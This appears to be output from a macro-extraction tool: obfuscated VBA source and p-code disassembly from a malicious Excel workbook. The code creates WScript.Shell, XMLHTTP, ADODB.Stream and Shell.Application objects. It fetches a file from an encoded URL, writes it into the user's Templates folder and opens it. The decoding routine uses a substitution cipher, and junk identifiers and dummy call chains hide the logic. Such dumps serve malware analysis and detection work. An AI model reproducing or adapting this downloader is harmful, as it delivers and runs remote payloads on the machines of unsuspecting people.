            For KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY = 1 To Len(YPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODE)
                If Mid(YPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODE, KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY, 1) = YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF Then GoTo LSub
            Next
LSub:
            Decrypt = Decrypt & Mid(FIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHIN, KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY, 1)

        Case Else

            Decrypt = Decrypt & YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF

    End Select

Next

For RR = 1 To Len(enc)

Next
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_7o_szf8q
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 953 bytes
' Line #0:
' 	FuncDefn (Sub Chr())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/ILJkbook - 12561 bytes
' Line #0:
' 	FuncDefn (Function Run(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #1:
' 	LitStr 0x0001 "*"
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	Concat 
' 	LitStr 0x0001 "*"
' 	Concat 
' 	St t0ea0a0840384a15e019665b2e996b73f 
' Line #2:
' 	Dim 
' 	VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #3:
' 	LitR8 0xEF9E 0xC6A7 0x714B 0x408D 
' 	St dhmpmrvyvrxwv 
' Line #4:
' 	Dim 
' 	VarDefn vbNullString (As Byte)
' Line #5:
' 	LitR8 0x353F 0xBA5E 0x58CD 0x40E7 
' 	St vbNullString 
' Line #6:
' 	Dim 
' 	VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Long)
' Line #7:
' 	LitR8 0x8312 0xCAC0 0xE7A1 0x4087 
' 	St m974e3e334b64ac13b6dec997fbabf21f 
' Line #8:
' 	Dim 
' 	VarDefn b08576ffe41cb67690655f1261f410844 (As Double)
' Line #9:
' 	LitR8 0xB852 0x851E 0x98EB 0x4082 
' 	St b08576ffe41cb67690655f1261f410844 
' Line #10:
' 	Ld b9d76f7072ca3da29e82e55579143fba0 
' 	St z2c55929d38494d4bf3ab6ba3dd16305c 
' Line #11:
' 	Dim 
' 	VarDefn kqeepfyakmzwuediw (As String)
' Line #12:
' 	LitStr 0x000B "naiveremove"
' 	St kqeepfyakmzwuediw 
' Line #13:
' 	Dim 
' 	VarDefn flamesight (As Byte)
' Line #14:
' 	LitR8 0x8312 0xCAC0 0xF3A1 0x4073 
' 	St flamesight 
' Line #15:
' 	Dim 
' 	VarDefn sweartrust (As Boolean)
' Line #16:
' 	LitR8 0xE560 0x22D0 0x79DB 0x4057 
' 	St sweartrust 
' Line #17:
' 	Dim 
' 	VarDefn prqhhqrabc (As Double)
' Line #18:
' 	LitR8 0x7CEE 0x353F 0x2A5E 0x405B 
' 	St prqhhqrabc 
' Line #19:
' 	Ld columnwall 
' 	Ld t0ea0a0840384a15e019665b2e996b73f 
' 	Like 
' 	Not 
' 	IfBlock 
' Line #20:
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	St z2c55929d38494d4bf3ab6ba3dd16305c 
' Line #21:
' 	Dim 
' 	VarDefn rTKLUHail (As Double)
' Line #22:
' 	LitR8 0x2B02 0x1687 0xBED9 0x404E 
' 	St rTKLUHail 
' Line #23:
' 	Ld rTKLUHail 
' 	LitR8 0xD2F2 0x624D 0xA810 0x4067 
' 	Ne 
' 	IfBlock 
' Line #24:
' 	Dim 
' 	VarDefn Auto_Open (As Byte)
' Line #25:
' 	LitR8 0xDD2F 0x0624 0x9981 0x406A 
' 	St Auto_Open 
' Line #26:
' 	Dim 
' 	VarDefn descifrar (As Long)
' Line #27:
' 	LitR8 0xAC08 0x5A1C 0x7F64 0x406D 
' 	St descifrar 
' Line #28:
' 	Dim 
' 	VarDefn AllUsersProfile (As String)
' Line #29:
' 	LitStr 0x000C "fadzjgdilazu"
' 	St AllUsersProfile 
' Line #30:
' 	EndIfBlock 
' Line #31:
' 	EndFunc 
' Line #32:
' Line #33:
' 	FuncDefn (Sub SpecialPath())
' Line #34:
' 	Dim 
' 	VarDefn CreateObject (As Integer)
' Line #35:
' 	LitDI2 0x0032 
' 	ArgsLd SpecialFolders 0x0001 
' 	LitDI2 0x0030 
' 	ArgsLd SpecialFolders 0x0001 
' 	Add 
' 	LitDI2 0x0030 
' 	ArgsLd SpecialFolders 0x0001 
' 	Add 
' 	St CreateObject 
' Line #36:
' 	Dim 
' 	VarDefn PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC (As Object)
' Line #37:
' 	Dim 
' 	VarDefn TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ (As String)
' Line #38:
' Line #39:
' 	SetStmt 
' 	LitStr 0x000D "WScript.Shell"
' 	ArgsLd OGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKC 0x0001 
' 	Set PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC 
' Line #40:
' 	LitStr 0x0009 "Templates"
' 	Ld PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC 
' 	ArgsMemLd CGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR 0x0001 
' 	St TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ 
' Line #41:
' 	Dim 
' 	VarDefn BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW
' Line #42:
' 	Dim 
' 	VarDefn HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS
' Line #43:
' 	Dim 
' 	VarDefn ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP
' Line #44:
' 	Dim 
' 	VarDefn ZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBW
' Line #45:
' 	Dim 
' 	VarDefn Decrypt
' Line #46:
' 	Dim 
' 	VarDefn send (As Integer)
' Line #47:
' 	Dim 
' 	VarDefn responseBody
' Line #48:
' 	Dim 
' 	VarDefn Status
' Line #49:
' 	LitDI2 0x0001 
' 	St send 
' Line #50:
' Line #51:
' Line #52:
' Line #53:
' Line #54:
' 	SetStmt 
' 	LitStr 0x0011 "microsoft.xmlhttp"
' 	ArgsLd OGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKC 0x0001 
' 	Set responseBody 
' Line #55:
' 	SetStmt 
' 	LitStr 0x0011 "Shell.Application"
' 	ArgsLd OGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKC 0x0001 
' 	Set Decrypt 
' Line #56:
' Line #57:
' 	Ld TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ 
' 	LitStr 0x000E "iYW]RS^X\N;n„n"
' 	ArgsLd SaveToFile 0x0001 
' 	Add 
' 	St ZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBW 
' Line #58:
' 	LitStr 0x0003 "get"
' 	LitStr 0x0026 "q~~zG<<CD;A@;?@F;>D><`~yzv<uqot|…ƒ;n„n"
' 	ArgsLd SaveToFile 0x0001 
' 	LitVarSpecial (False)
' 	Ld responseBody 
' 	ArgsMemCall Open 0x0003 
' Line #59:
' 	Ld responseBody 
' 	ArgsMemCall ZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR 0x0000 
' Line #60:
' 	Ld responseBody 
' 	MemLd FIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHIN 
' 	St HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS 
' Line #61:
' 	Ld responseBody 
' 	MemLd YPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODE 
' 	LitDI2 0x00C8 
' 	Eq 
' 	IfBlock 
' Line #62:
' 	SetStmt 
' 	LitStr 0x000C "adodb.stream"
' 	ArgsLd OGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKC 0x0001 
' 	Set BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW 
' Line #63:
' 	Ld BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW 
' 	ArgsMemCall Open 0x0000 
' Line #64:
' 	Ld send 
' 	Ld BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW 
' 	MemSt Type 
' Line #65:
' 	Ld HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS 
' 	Ld BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW 
' 	ArgsMemCall Xor 0x0001 
' Line #66:
' 	Ld ZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBW 
' 	Ld send 
' 	Ld send 
' 	Add 
' 	Ld BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW 
' 	ArgsMemCall TWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNX 0x0002 
' Line #67:
' 	Ld BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW 
' 	ArgsMemCall Close 0x0000 
' Line #68:
' 	EndIfBlock 
' Line #69:
' 	Ld ZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBW 
' 	Paren 
' 	Ld Decrypt 
' 	ArgsMemCall Open 0x0001 
' Line #70:
' 	EndSub 
' Line #71:
' Line #72:
' 	FuncDefn (Sub rnIkDDisHp4e1dEwtDO8XRgW())
' Line #73:
' 	Ld id_02CE 
' 	St SaveToFile 
' Line #74:
' 	ArgsCall Jb8AvPk2VR 0x0000 
' Line #75:
' 	EndSub 
' Line #76:
' Line #77:
' 	FuncDefn (Function id_02CC(id_FFFE As Currency) As Currency)
' Line #78:
' 	ArgsCall (Call) JxU0xFkI7x 0x0000 
' Line #79:
' 	EndFunc 
' Line #80:
' 	FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #81:
' 	ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000 
' Line #82:
' 	EndFunc 
' Line #83:
' 	FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #84:
' 	ArgsCall (Call) id_02CA 0x0000 
' Line #85:
' 	EndFunc 
' Line #86:
' 	FuncDefn (Static Function id_02CA(id_FFFE As Date) As Date)
' Line #87:
' 	ArgsCall (Call) id_02C8 0x0000 
' Line #88:
' 	EndFunc 
' Line #89:
' 	FuncDefn (Function id_02C8(id_FFFE As Variant) As Variant)
' Line #90:
' 	ArgsCall (Call) FZ4yZPaWVH 0x0000 
' Line #91:
' 	EndFunc 
' Line #92:
' 	FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #93:
' 	ArgsCall (Call) Template 0x0000 
' Line #94:
' 	EndFunc 
' Line #95:
' 	FuncDefn (Function Template(id_FFFE As Variant) As Variant)
' Line #96:
' 	ArgsCall (Call) rnIKJffoHfHp4e1dEwtDO8XIFLW 0x0000 
' Line #97:
' 	EndFunc 
' Line #98:
' 	FuncDefn (Static Function rnIKJffoHfHp4e1dEwtDO8XIFLW(id_FFFE As Double) As Double)
' Line #99:
' 	ArgsCall (Call) TJUklhzjrgwBHyE3XYkFjkdfdstyjq 0x0000 
' Line #100:
' 	EndFunc 
' Line #101:
' 	FuncDefn (Function TJUklhzjrgwBHyE3XYkFjkdfdstyjq(id_FFFE As Single) As Single)
' Line #102:
' 	ArgsCall (Call) Yjj8AvPMFBB 0x0000 
' Line #103:
' 	EndFunc 
' Line #104:
' Line #105:
' 	FuncDefn (Function SaveToFile(RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY As String, id_FFFE As String) As String)
' Line #106:
' Line #107:
' 	Dim (Const) 
' 	LitStr 0x001A "abcdefghijklmnopqrstuvwxyz"
' 	VarDefn IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH (As String) 0x00AB
' Line #108:
' 	Dim (Const) 
' 	LitStr 0x001A "zebrascdfghijklmnopqtuvwxy"
' 	VarDefn KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY (As String) 0x00D0
' Line #109:
' 	Dim (Const) 
' 	LitStr 0x001A "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
' 	VarDefn CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV (As String) 0x00C4
' Line #110:
' 	Dim (Const) 
' 	LitStr 0x001A "ZEBRASCDFGHIJKLMNOPQTUVWXY"
' 	VarDefn YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF (As String) 0x00C1
' Line #111:
' Line #112:
' 	Dim 
' 	VarDefn RR (As Long) 0x00D5
' Line #113:
' 	Dim 
' 	VarDefn Y78R (As Long) 0x00D0
' Line #114:
' 	Dim 
' 	VarDefn Asc (As String) 0x00BC
' Line #115:
' 	Dim 
' 	VarDefn USub (As String) 0x00AE
' Line #116:
' 	Dim 
' 	VarDefn LSub (As Byte)
' Line #117:
' 	Ld enc 
' 	St LSub 
' Line #118:
' 	Ld RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY 
' 	LitStr 0x0000 ""
' 	Concat 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #119:
' Line #120:
' Line #121:
' 	StartForVariable 
' 	Ld RR 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY 
' 	FnLen 
' 	For 
' Line #122:
' 	Ld Asc 
' 	Ld RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY 
' 	Ld RR 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	ArgsLd Sheet1 0x0001 
' 	LitDI2 0x000D 
' 	Sub 
' 	ArgsLd SpecialFolders 0x0001 
' 	Concat 
' 	St Asc 
' Line #123:
' 	StartForVariable 
' 	Next 
' Line #124:
' Line #125:
' Line #126:
' 	StartForVariable 
' 	Ld RR 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Asc 
' 	FnLen 
' 	For 
' Line #127:
' Line #128:
' 	Ld Asc 
' 	Ld RR 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St USub 
' Line #129:
' Line #130:
' 	Ld USub 
' 	ArgsLd Sheet1 0x0001 
' 	SelectCase 
' Line #131:
' Line #132:
' 	LitDI2 0x0041 
' 	LitDI2 0x005A 
' 	CaseTo 
' 	CaseDone 
' Line #133:
' 	StartForVariable 
' 	Ld Y78R 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF 
' 	FnLen 
' 	For 
' Line #134:
' 	Ld YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF 
' 	Ld Y78R 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Ld USub 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Sheet2 
' 	EndIf 
' Line #135:
' 	StartForVariable 
' 	Next 
' Line #136:
' 	Label Sheet2 
' Line #137:
' 	Ld SaveToFile 
' 	Ld CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV 
' 	Ld Y78R 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Concat 
' 	St SaveToFile 
' Line #138:
' Line #139:
' 	LitDI2 0x0061 
' 	LitDI2 0x007A 
' 	CaseTo 
' 	CaseDone 
' Line #140:
' 	StartForVariable 
' 	Ld Y78R 
' 	EndForVariable 
' 	LitDI2 0x0001 
